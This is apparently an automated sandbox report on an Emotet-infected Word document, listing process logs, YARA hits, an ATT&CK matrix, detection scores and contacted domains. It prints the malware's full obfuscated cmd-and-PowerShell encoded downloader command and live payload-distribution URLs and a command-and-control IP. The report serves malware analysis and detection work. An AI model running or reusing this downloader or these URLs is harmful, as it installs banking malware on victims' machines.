Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQA
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_10004C5A cpuid

7_2_10004C5A

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_10007D46 GetSystemTimeAsFileTime,GetCurrentThreadId,GetTickCount64,QueryPerformanceCounter,

7_2_10007D46

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Emotet

Show sources

Source: Yara match	File source: 0000000B.00000002.2118205619.0000000000360000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2119457993.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2110989344.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2122389550.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2119525565.0000000000221000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2112555431.0000000000321000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2113546324.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2113574384.00000000001D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2122425007.0000000000201000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2118310985.0000000000381000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2112508539.0000000000300000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2115211069.0000000000240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2349243724.00000000001D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2349226976.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2115944509.00000000007E1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 11.2.rundll32.exe.380000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.7e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.360000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.360000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.320000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.300000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.300000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation11	Path Interception	Process Injection111	Disable or Modify Tools1	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer3	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scripting32	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Deobfuscate/Decode Files or Information3	LSASS Memory	File and Directory Discovery3	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Encrypted Channel2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Native API1	Logon Script (Windows)	Logon Script (Windows)	Scripting32	Security Account Manager	System Information Discovery26	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Exploitation for Client Execution3	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information1	NTDS	Security Software Discovery31	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Command and Scripting Interpreter211	Network Logon Script	Network Logon Script	Masquerading11	LSA Secrets	Virtualization/Sandbox Evasion2	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	PowerShell3	Rc.common	Rc.common	Virtualization/Sandbox Evasion2	Cached Domain Credentials	Process Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection111	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Hidden Files and Directories1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Rundll321	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Documenten_9274874 8574977265.doc	37%	Virustotal		Browse
Documenten_9274874 8574977265.doc	44%	ReversingLabs	Document-Word.Trojan.Heuristic

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
13.2.rundll32.exe.200000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
9.2.rundll32.exe.1d0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
14.2.rundll32.exe.1d0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
7.2.rundll32.exe.230000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.2.rundll32.exe.7e0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
11.2.rundll32.exe.380000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
12.2.rundll32.exe.220000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
8.2.rundll32.exe.320000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
veterinariadrpopui.com	4%	Virustotal		Browse
wpsapk.com	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://veterinariadrpopui.com	0%	Avira URL Cloud	safe
http://veterinariadrpopui.com/content/5f18Q/	100%	Avira URL Cloud	malware
http://sofsuite.com/wp-includes/2jm3nIk/	0%	Avira URL Cloud	safe
http://khanhhoahomnay.net/wordpress/CGMC/	100%	Avira URL Cloud	malware
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
https://gurztac.wtchevalier.com/wp-content/YzZ6YZ/	0%	Avira URL Cloud	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://shop.elemenslide.com	0%	Avira URL Cloud	safe
http://khanhhoahomnay.net	0%	Avira URL Cloud	safe
http://shop.elemenslide.com/wp-content/n/	100%	Avira URL Cloud	malware
http://5.2.136.90/gv38bn75mnjox2y/c6b9ni4/vj3ut3/kld53/bp623/r5qw7a8y6jtlf9qu/	0%	Avira URL Cloud	safe
http://sofsuite.com	0%	Avira URL Cloud	safe
http://wpsapk.com	0%	Avira URL Cloud	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://wpsapk.com/wp-admin/v/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
veterinariadrpopui.com	209.59.139.39	true	true	4%, Virustotal, Browse	unknown
wpsapk.com	104.18.61.59	true	true	1%, Virustotal, Browse	unknown
sofsuite.com	104.27.144.251	true	true		unknown
khanhhoahomnay.net	210.86.239.69	true	true		unknown
shop.elemenslide.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://veterinariadrpopui.com/content/5f18Q/	true	Avira URL Cloud: malware	unknown
http://sofsuite.com/wp-includes/2jm3nIk/	true	Avira URL Cloud: safe	unknown
http://khanhhoahomnay.net/wordpress/CGMC/	true	Avira URL Cloud: malware	unknown
http://5.2.136.90/gv38bn75mnjox2y/c6b9ni4/vj3ut3/kld53/bp623/r5qw7a8y6jtlf9qu/	true	Avira URL Cloud: safe	unknown
http://wpsapk.com/wp-admin/v/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.windows.com/pctv.	rundll32.exe, 00000008.00000002.2113058127.0000000001D90000.00000002.00000001.sdmp	false		high
http://veterinariadrpopui.com	powershell.exe, 00000005.00000002.2114107313.00000000038AD000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://investor.msn.com	rundll32.exe, 00000006.00000002.2117217440.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111910597.0000000001DA0000.00000002.00000001.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	rundll32.exe, 00000006.00000002.2117217440.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111910597.0000000001DA0000.00000002.00000001.sdmp	false		high
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	rundll32.exe, 00000006.00000002.2119198742.0000000001E17000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2112858407.0000000001F87000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2113351173.0000000001F77000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
